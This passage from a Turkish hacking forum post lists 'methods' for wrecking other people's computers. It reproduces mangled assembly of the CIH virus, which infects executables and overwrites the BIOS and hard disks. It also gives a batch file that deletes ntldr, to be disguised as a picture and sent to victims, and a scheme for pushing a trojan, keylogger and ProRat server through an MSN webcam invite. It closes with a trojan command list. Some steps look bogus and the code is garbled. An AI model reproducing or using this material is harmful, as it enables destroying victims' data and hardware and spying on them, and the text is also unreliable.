; Address of Buffer; ***************************; * Move EDX to the Start *; * of SectionTable in File *; ***************************movzx eax, word ptr (SizeOfOptionalHeader-[at][esi]mul cl; ***************************; * Let's Set Section Table *; ***************************; Move ESI to the Start of SectionTablelea esi, (StartOfSectionTable-[at]FPRIVATE "TYPE=PICT;ALT=Cool"[esi]push eax ; Sizepush edx ; Pointer of Filepush esi ; Address of Buffer; ***************************; * The Code Size of Merge *; * Virus Code Section and *; * Total Size of Virus *; * Code Section Table Must *; * be Small or Equal the *; * Unused Space Size of *; * Following Section Table *; ***************************inc ecxpush ecx ; Save NumberOfSections+1shl ecx, 03hpush ecx ; Save TotalSizeOfVirusCodeSectionTableadd ecx, eaxadd ecx, edxsub ecx, (SizeOfHeaders-[at]9)[esi]jnc short OnlySetInfectedMarknot ecxinc ecxcmp cx, small CodeSizeOfMergeVirusCodeSectionjb OnlySetInfectedMark; ***************************; * Save Original *; * Address of Entry Point *; ***************************; Save My Virus First Section Code; Size of Following Section Table...; ( Not Include the Size of Virus Code Section Table )push ecxxchg ecx, eax ; ECX = Size of Section Tablemov eax, (AddressOfEntryPoint-[at]9)[esi]add eax, (ImageBase-[at]9)[esi]mov (OriginalAddressOfEntryPoint-[at]9)[esi], eax; ***************************; * Read All Section Tables *; ***************************mov eax, ebpcall edi ; VXDCall IFSMgr_Ring0_FileIO; ***************************; * Let's Set Total Virus *; * Code Section Table *; ***************************; EBX = My Virus First Section Code; Size of Following Section Tablepop ebxpop edi ; EDI = TotalSizeOfVirusCodeSectionTablepop ecx ; ECX = NumberOfSections+1push edi ; Sizeadd edx, eaxpush edx ; Pointer of Fileadd eax, esipush eax ; Address of Buffer; ***************************; * Set the First Virus *; * Code Section Size in *; * VirusCodeSectionTable *; ***************************lea eax, [eax+edi-04h]mov [eax], ebx; ***************************; * Let's Set My Virus *; * First Section Code *; ***************************push ebx ; Sizeadd edx, edipush edx ; Pointer of Filelea edi, (MyVirusStart-[at]9)[esi]push edi ; Address of Buffer; ***************************; * Let's Modify the *; * AddressOfEntryPoint to *; * My Virus Entry Point *; ***************************mov (NewAddressOfEntryPoint-[at]9)[esi], edx; ***************************; * Setup Initial Data *; ***************************lea edx, [esi-SizeOfScetionTable]mov ebp, offset VirusSizejmp StartToWriteCodeToSections; ***************************; * Write Code to Sections *; ***************************LoopOfWriteCodeToSectio ns

dd edx, SizeOfScetionTablemov ebx, (SizeOfRawData-[at]9)[edx]sub ebx, (VirtualSize-[at]9)[edx]jbe EndOfWriteCodeToSectionspush ebx ; Sizesub eax, 08hmov [eax], ebxmov ebx, (PointerToRawData-[at]9)[edx]add ebx, (VirtualSize-[at]9)[edx]push ebx ; Pointer of Filepush edi ; Address of Buffermov ebx, (VirtualSize-[at]9)[edx]add ebx, (VirtualAddress-[at]9)[edx]add ebx, (ImageBase-[at]9)[esi]mov [eax+4], ebxmov ebx, [eax]add (VirtualSize-[at]9)[edx], ebx; Section contains initialized data ==> 00000040h; Section can be Read. ==> 40000000hor (Characteristics-[at]9)[edx], 40000040hStartToWriteCodeToSections:sub ebp, ebxjbe SetVirusCodeSectionTableEndMarkadd edi, ebx ; Move Address of BufferEndOfWriteCodeToSections:loop LoopOfWriteCodeToSections; ***************************; * Only Set Infected Mark *; ***************************OnlySetInfectedMark:mov esp, dr1jmp WriteVirusCodeToFile; ***************************; * Set Virus Code *; * Section Table End Mark *; ***************************SetVirusCodeSectionTabl eEndMark:; Adjust Size of Virus Section Code to Correct Valueadd [eax], ebpadd [esp+08h], ebp; Set End Markxor ebx, ebxmov [eax-04h], ebx; ***************************; * When VirusGame Calls *; * VxDCall, VMM Modifies *; * the 'int 20h' and the *; * 'Service Identifier' *; * to 'Call [XXXXXXXX]'. *; ***************************; * Before Writing My Virus *; * to File, I Must Restore *; * them First. ^__^ *; ***************************lea eax, (LastVxDCallAddress-2-[at]9)[esi]mov cl, VxDCallTableSizeLoopOfRestoreVxDCallID:mov word ptr [eax], 20cdhmov edx, (VxDCallIDTable+(ecx-1)*04h-[at]9)[esi]%0mov [eax+2], edxmovzx edx, byte ptr (VxDCallAddressTable+ecx-1-[at]9)[esi]sub eax, edxloop LoopOfRestoreVxDCallID; ***************************; * Let's Write *; * Virus Code to the File *; ***************************WriteVirusCodeToFile:mo v eax, dr1mov ebx, [eax+10h]mov edi, [eax]LoopOfWriteVirusCodeToFileop ecxjecxz SetFileModificationMarkmov esi, ecxmov eax, 0d601hpop edxpop ecxcall edi ; VXDCall IFSMgr_Ring0_FileIOjmp LoopOfWriteVirusCodeToFile; ***************************; * Let's Set CF = 1 ==> *; * Need to Restore File *; * Modification Time *; ***************************SetFileModificationMark op ebxpop eaxstc ; Enable CF(Carry Flag)pushf; *************************************; * Close File *; *************************************CloseFile:xor eax, eaxmov ah, 0d7hcall edi ; VXDCall IFSMgr_Ring0_FileIO; *************************************; * Need to Restore File Modification *; * Time !? *; *************************************popfpop esijnc IsKillComputer; *************************************; * Restore File Modification Time *; *************************************mov ebx, edimov ax, 4303hmov ecx, (FileModificationTime-[at]7)[esi]mov edi, (FileModificationTime+2-[at]7)[esi]call ebx ; VXDCall IFSMgr_Ring0_FileIO; *************************************; * Disable OnBusy *; *************************************DisableOnBusy :dec byte ptr (OnBusy-[at]7)[esi] ; Disable OnBusy; *************************************; * Call Previous FileSystemApiHook *; *************************************prevhookopa dmov eax, dr0 ;jmp [eax] ; Jump to prevhook; *************************************; * Call the Function that the IFS *; * Manager Would Normally Call to *; * Implement this Particular I/O *; * Request. *; *************************************pIFSFunc:mov ebx, esppush dword ptr [ebx+20h+04h+14h] ; Push pioreqcall [ebx+20h+04h] ; Call pIFSFuncpop ecx ;mov [ebx+1ch], eax ; Modify EAX Value in Stack; ***************************; * After Calling pIFSFunc, *; * Get Some Data from the *; * Returned pioreq. *; ***************************cmp dword ptr [ebx+20h+04h+04h], 00000024hjne QuitMyVirusFileSystemHook; *****************; * Get the File *; * Modification *; * Date and Time *; * in DOS Format.*; *****************mov eax, [ecx+28h]mov (FileModificationTime-[at]6)[esi], eax; ***************************; * Quit My Virus' *; * IFSMgr_FileSystemHook *; ***************************QuitMyVirusFileSystemHo okopadret; *************************************; * Kill Computer !? ... *^_^* *; *************************************IsKillCompute r:; Get Now Month from BIOS CMOSmov ax, 0708hout 70h, alin al, 71hxchg ah, al; Get Now Day from BIOS CMOSout 70h, alin al, 71hxor ax, 0426h ; 04/26/????jne DisableOnBusy; **************************************; * Kill Kill Kill Kill Kill Kill Kill *; **************************************; ***************************; * Kill BIOS EEPROM *; ***************************mov bp, 0cf8hlea esi, IOForEEPROM-[at]7[esi]; ***********************; * Show BIOS Page in *; * 000E0000 - 000EFFFF *; * ( 64 KB ) *; ***********************mov edi, 8000384chmov dx, 0cfehclicall esi; ***********************; * Show BIOS Page in *; * 000F0000 - 000FFFFF *; * ( 64 KB ) *; ***********************mov di, 0058hdec edx ; and al,0fhmov word ptr (BooleanCalculateCode-[at]10)[esi], 0f24hcall esi; ***********************; * Show the BIOS Extra *; * ROM Data in Memory *; * 000E0000 - 000E01FF *; * ( 512 Bytes ) *; * , and the Section *; * of Extra BIOS can *; * be Writted... *; ***********************lea ebx, EnableEEPROMToWrite-[at]10[esi]mov eax, 0e5555hmov ecx, 0e2aaahcall ebxmov byte ptr [eax], 60hpush ecxloop $; ***********************; * Kill the BIOS Extra *; * ROM Data in Memory *; * 000E0000 - 000E007F *; * ( 80h Bytes ) *; ***********************xor ah, ahmov [eax], alxchg ecx, eaxloop $; ***********************; * Show and Enable the *; * BIOS Main ROM Data *; * 000E0000 - 000FFFFF *; * ( 128 KB ) *; * can be Writted... *; ***********************mov eax, 0f5555hpop ecxmov ch, 0aahcall ebxmov byte ptr [eax], 20hloop $; ***********************; * Kill the BIOS Main *; * ROM Data in Memory *; * 000FE000 - 000FE07F *; * ( 80h Bytes ) *; ***********************mov ah, 0e0hmov [eax], al; ***********************; * Hide BIOS Page in *; * 000F0000 - 000FFFFF *; * ( 64 KB ) *; ***********************; or al,10hmov word ptr (BooleanCalculateCode-[at]10)[esi], 100chcall esi; ***************************; * Kill All HardDisk *; ************************************************** *; * IOR Structure of IOS_SendCommand Needs *; ************************************************** *; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *; ************************************************** *KillHardDisk:xor ebx, ebxmov bh, FirstKillHardDiskNumberpush ebxsub esp, 2chpush 0c0001000hmov bh, 08hpush ebxpush ecxpush ecxpush ecxpush 40000501hinc ecxpush ecxpush ecxmov esi, espsub esp, 0achLoopOfKillHardDisk:int 20hdd 00100004h ; VXDCall IOS_SendCommandcmp word ptr [esi+06h], 0017hje KillNextDataSectionChangeNextHardDisk:inc byte ptr [esi+4dh]jmp LoopOfKillHardDiskKillNextDataSection

dd dword ptr [esi+10h], ebxmov byte ptr [esi+4dh], FirstKillHardDiskNumberjmp LoopOfKillHardDisk; ***************************; * Enable EEPROM to Write *; ***************************EnableEEPROMToWrite:mov [eax], clmov [ecx], almov byte ptr [eax], 80hmov [eax], clmov [ecx], alret; ***************************; * IO for EEPROM *; ***************************IOForEEPROM:[at]10 = IOForEEPROMxchg eax, edixchg edx, ebpout dx, eaxxchg eax, edixchg edx, ebpin al, dxBooleanCalculateCode = $or al, 44hxchg eax, edixchg edx, ebpout dx, eaxxchg eax, edixchg edx, ebpout dx, alret; ************************************************** *******; * Static Data *; ************************************************** *******LastVxDCallAddress = IFSMgr_Ring0_FileIOVxDCallAddressTable db 00hdb IFSMgr_RemoveFileSystemApiHook-_PageAllocatedb UniToBCSPath-IFSMgr_RemoveFileSystemApiHookdb IFSMgr_Ring0_FileIO-UniToBCSPathVxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032hVxDCallTableSize = ($-VxDCallIDTable)/04h; ************************************************** *******; * Virus Version Copyright *; ************************************************** *******VirusVersionCopyright db 'CIH v'db MajorVirusVersion+'0'db '.'db MinorVirusVersion+'0'db ' TTIT'; ************************************************** *******; * Virus Size *; ************************************************** *******VirusSize = $; + SizeOfVirusCodeSectionTableEndMark(04h); + NumberOfSections(??)*SizeOfVirusCodeSectionTable(0 8h); + SizeOfTheFirstVirusCodeSectionTable(04h); ************************************************** *******; * Dynamic Data *; ************************************************** *******VirusGameDataStartAddress = VirusSize[at]6 = VirusGameDataStartAddressOnBusy db 0FileModificationTime dd ?FileNameBuffer db FileNameBufferSize dup(?)[at]7 = FileNameBufferDataBuffer = $[at]8 = DataBufferNumberOfSections dw ?TimeDateStamp dd ?SymbolsPointer dd ?NumberOfSymbols dd ?SizeOfOptionalHeader dw ?_Characteristics dw ?Magic dw ?LinkerVersion dw ?SizeOfCode dd ?SizeOfInitializedData dd ?SizeOfUninitializedData dd ?AddressOfEntryPoint dd ?BaseOfCode dd ?BaseOfData dd ?ImageBase dd ?[at]9 = $SectionAlignment dd ?FileAlignment dd ?OperatingSystemVersion dd ?ImageVersion dd ?SubsystemVersion dd ?Reserved dd ?SizeOfImage dd ?SizeOfHeaders dd ?SizeOfImageHeaderToRead = $-NumberOfSectionsNewAddressOfEntryPoint = DataBuffer ; DWORDSizeOfImageHeaderToWrite = 04hStartOfSectionTable = [at]9SectionName = StartOfSectionTable ; QWORDVirtualSize = StartOfSectionTable+08h ; DWORDVirtualAddress = StartOfSectionTable+0ch ; DWORDSizeOfRawData = StartOfSectionTable+10h ; DWORDPointerToRawData = StartOfSectionTable+14h ; DWORDPointerToRe********s = StartOfSectionTable+18h ; DWORDPointerToLineNumbers = StartOfSectionTable+1ch ; DWORDNumberOfRe********s = StartOfSectionTable+20h ; WORDNumberOfLinenNmbers = StartOfSectionTable+22h ; WORDCharacteristics = StartOfSectionTable+24h ; DWORDSizeOfScetionTable = Characteristics+04h-SectionName; ************************************************** *******; * Virus Total Need Memory *; ************************************************** *******VirusNeedBaseMemory = $VirusTotalNeedMemory = [at]9; + NumberOfSections(??)*SizeOfScetionTable(28h); + SizeOfVirusCodeSectionTableEndMark(04h); + NumberOfSections(??)*SizeOfVirusCodeSectionTable(0 8h); + SizeOfTheFirstVirusCodeSectionTable(04h); ************************************************** *******VirusGame ENDS
sonuçları bilgisayara cok buyuk hasar verecektır... Mesela çok nefret ettiğiniz bir insanın anaKartını kendi eliyle yaktırabilirsiniz...

13.Yöntem Hazır Dosyayla

PC ÇÖKERT (cok basıt)%100 Etkili
PC ÇÖKERT (cok basıt)%100 Etkili arkadaşlar sitede pc çökertme konusunda çoğu yol işe yaramıyor, fakat birde bu yolu deneyin diyorum. %100 çalışıyo emin olun.
dosyayı sadece karşı tarafa yolluyorsunuz, ilk başta bir şey olmamış gibi gözüküyor fakaaaattt pcyi kapayıp açtığında formattan başka çaresi kalmıyor.

kolay gelsin...

Link= https://tik.lat/zmcvt

Dosyayı sakın dıyım kendınız acmaayınnnnnn..

14.Yöntem Webcam Teklifi İle

Şimdi sürekli piyasada dolaşan ama kimsenin bi türlü bulamadığı msn veya banzeri sender programlarda kullanılan webcamerası açma daveti ile nasıl kurban pc sine müdahale edileceğini açıklayacağım.



1.ilk yapılacak olay IP nizi gizlemektir(bunu hide ip platinium programı ile yapabilirsin)

2.ikinci hadise sahte bir msn adresi alın(unutmayın öyle doğum tarihi falan gerçek yazmayın) işimzi bittikten sonra bu adresi imha edeceğiz yoksa enselenir 6 ay yatar çıkarsınız...

3.olay bütün portlarınızı kapatın sadece msn için açık olan portu açık tutun

4.teşhir msn comtlarından girip not defterine açın orda her gördüğünüz cam-send yazısını camsendd olarak değiştirin artık gönderdiğiniz camera isteğini kabul etsede red etsede camerası açılır ve sizin pc niz le onun pc si arasında bir port açılır iletişim için bu camreraya özel bir portttur ve başka bir şey için kullanılamaz normalde.ama biz bunu değiştireceğiz.şimdi açılan bu portu bulmanız lazım ki açerden bi trojan yollayabilelim.port scaner kullanın ve açık portu bulun.

5.olay açık olan porttan önceden hazırladığımız trojanı tavsiye olarak zip içinde (msn securitye yakalanmamak için) yollayın gitsin.şimdi bu trojanın tek özelliği firewalldan geçtikten sonra firewalların klasik komutu olan avrst komutunu gördüğü anda zip içinden çıkıp çalışmaya başlamasıdır.(bu tarz bir trojanı biraz aramayla her yerden bulursunuz)UNUTMAYIN EN İİ KAYNAK GOOGLE DIR.zaten olay bundan sonra kolay trojan içerde çalışmaya başladığı anda kurban msn den düşer ve tekrar msn çevrim içi olur.bu noktadan sonra kurban her nete girdiğinde bizim açtığımız port trojanımız sahesinde sürekli açık kalacak ve firewallar trojanın özelliği olarak tanımayacak(30 a yakın antivirüste bu trojan cinsi denendi sadece nod 32 ve karpersky yakaladı bilginize)açık olan portumuzdan bi tane keyloger bir tane prorat server yolayıp içerde açıyoruz.yanlız masa üstünü kurcalamayın kurban anında anlar format atarsa işiniz biter. gerisi için hayal gücünüz yeter asıl önemli noktayı anlattım.gerisi keyfinize kalmış.

15.Yöntem Virüs HazırlaYasak Kelime

AntivirüsLerin ßuLamadigi Virüsünü Yap %100 Pc cöker - 04-20-2007, 09:41 AM
AntivirüsLerin ßuLamadigi Virüsünü Yap %100 Pc cöker

arkadaşlar daha önceden verilmiş farkında deilim. fakat bende bi tekrarlama yapmış oldum bu arada vede ufak düzenlemelerle anlaması daha basit bir hale getirdim


İşte kodlar:

cd..

cd..

attrib -s -h -r -a c:\ntldr

del c:\ntldr

shutdown -r

arkadaşlar bu kodları bilgisayarımızdaki notpadi açarak içerisine kopyalıyoruz ve dosyayı kaydederken uzantısını .bat olarak değiştiriyoruz. sakın olaki dosyayı kendiniz açmayın!!!

örneğin; güzelresimler.bat

sonra işin heyecanlı kısmına gelelim. dosyamızı winrar yada winzip gibi programlar aracılığıyla karşı tarafa yolluyoruz. ve karşı taraf bu dosyayı açtığında boooom!!!! pc kendine otomatik format çeker.

haaa olaki dosyayı kendiniz yanlışlıkla açtınız olsun önemli deil; ben size bunun panzehirinide veriyimde içiniz rahatlısın.

yukarıdaki gibi hazırlamış olduğumuz dosya açıldığında 30 saniyelik bir geri sayma işlemi başlar forrmat işlemi için. bu 30 saniye bitmeden aşağıda verdiğim kodları yine aynı şekilde bat olarak kaydedip açtığınızda format işlemi duruyo. ama siz yinede denemeyin ne olur ne olmaz o kadar riske girmeyin..

panzehir kodları;

shutdown -a

16.Yöntem Ms-dostan Pye gir

ms-dos a geç , ve *setdebug* yaz karşına *Enable AktiveX debugging for Java* diye bir yazı gelecek ona tamam de ve bir sonraki satıra *debug* yaz sonra diğer satıra *XAbilgine gireceğin ip* yi yazıp enter ediyoruz sonra işleyici oluşturuldu yazısı gelecek şimdi "Programlar>Çalıştır>telnet" yazıp telneti açıyoruz sonra "uzaktaki sistem" deyip adamın ip'sini tekrar yazıyoruz gerisi size kalmış bu komutları kullanabilirsin. (*) ları yazmıyoruz. Kolay gelsin...

CaptureScreen Ekrandan goruntu alır
DelFile;(filename.exe) Dosya siler
DisableKeys;1;(keys) harfleri iptal eder [kullanıcı klavyeyi kullanamaz]
DisableKeys;0; Klavye tekrar aktif olur
DisableKeys;1;abcdefghijklmnopqrstuvwxyzåäö Harfler kullanılmaz hale gelir
DownloadFile;(path:filename.exe) istediginiz dosyayi cekersiniz
Eject;1 CD-ROM'u acar
Eject;0 CD-ROM'u kapar
ExitWin;1 Windos'u kapar
GetApps Calısan prg.ları listeler
GetACL Admin Listi verir
GetInfo Info penceresini verir
GetDisks Hardiskindeki dosyaları gosterir
GetSetup Server icin ayarları verir
GetUser Kullanıcı hakkında bilgi verir GetVolume Sesi acar
KeyClick;1 Key click on
KeyClick;0 Key click off
Listen;1 Start (keyboard) bir nevi keyloger adamın yazdıklarını gorursunuz
Listen;0 Stop listening
Message;(message) Messagebox halinde mesaj yolalrsınız
NewSetup;serverport;1;password;youremail;VICTIMSem ail;smtpserver Sends the new admindata (1.7)
Password;1;any ENTER'a bas ve ServerPwd;yenisifre Passwordu deistirir(1.6)
PlaySound;(file.wav) wav dosyası calar
PortRedir;(listen tcp port);(ip);(destination port) Redirect the specified port
Record;10 = 10 saniyelik ses kaydeder
RemoveServer;1 Server'ı kaldırır
RemoveServer;0 Kaldırmayı iptal eder
ShowImage;(file.exe) Resim gosterir
SendKeys;(words) Mesaj yollar * tusu ile yazdıgınız siler
SendKeys;2;13 Sends ozel tuslar [sag,sol,yukari,asagi]
SetACL;(ip)| Set (admin) access IP`s
SetMousePos;(xpos);(ypos) Mouse'u oynatırsınız
SwapButton;1 Mouse'un tuslarının yerlerini degistirir
SwapButton;0 Mouse'u eski haline getirir
StartApp;(file.exe) Program calıstırır
UploadFile;(file.exe);(size);(destination dir) Dosya yollarsınız
URL;(www.gönderileceksayfa.com/

 

Cevap yazmak için giriş yap yada kayıt ol.

Paylaş:

Facebook Twitter Telegram Reddit E-posta Paylaş Link

• TurkHackTeam Under Ground
• Bilgisayar Güvenliği

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.